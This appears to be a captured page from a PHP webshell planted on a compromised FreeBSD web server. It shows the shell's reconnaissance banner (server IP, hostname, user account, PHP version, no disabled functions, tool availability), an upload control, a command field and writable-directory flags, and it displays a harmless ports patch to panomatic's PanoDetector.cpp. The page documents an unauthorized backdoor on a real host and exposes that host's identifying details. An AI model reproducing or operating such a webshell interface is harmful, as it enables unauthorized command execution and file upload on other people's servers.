403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.116
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/graphics/panomatic/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/graphics/panomatic/files/patch-panomatic-PanoDetector.cpp
--- panomatic/PanoDetector.cpp.orig	2008-03-10 20:17:33.000000000 +0000
+++ panomatic/PanoDetector.cpp	2012-09-24 12:02:46.529117189 +0000
@@ -26,7 +26,7 @@
 	_sieve1Width(10), _sieve1Height(10), _sieve1Size(10),
 	_kdTreeSearchSteps(40), _kdTreeSecondDistance(0.15), _sieve2Width(5), _sieve2Height(5),
 	_sieve2Size(1), _test(false), _cores(utils::getCPUCount()), _ransacIters(1000), _ransacDistanceThres(25),
-	_minimumMatches(4), _linearMatch(false), _linearMatchLen(1), _downscale(true)
+	_minimumMatches(4), _linearMatch(false), _linearMatchLen(1), _scale(0.5)
 {
 	
 }
@@ -67,7 +67,7 @@
 	cout << "Output file       : " << _outputFile << endl;
 	cout << "Number of CPU     : " << _cores << endl << endl;
 	cout << "Input image options" << endl;
-    cout << "  Downscale to half-size : " << (_downscale?"yes":"no") << endl;
+    cout << "  Scale factor : " << _scale << endl;
     cout << "SURF Options" << endl;
 	cout << "  Extended : " << (_extendedSurf?"yes":"no") << endl;
 	cout << "  Score threshold : " << _surfScoreThreshold << endl;

Youez - 2016 - github.com/yon3zu
LinuXploit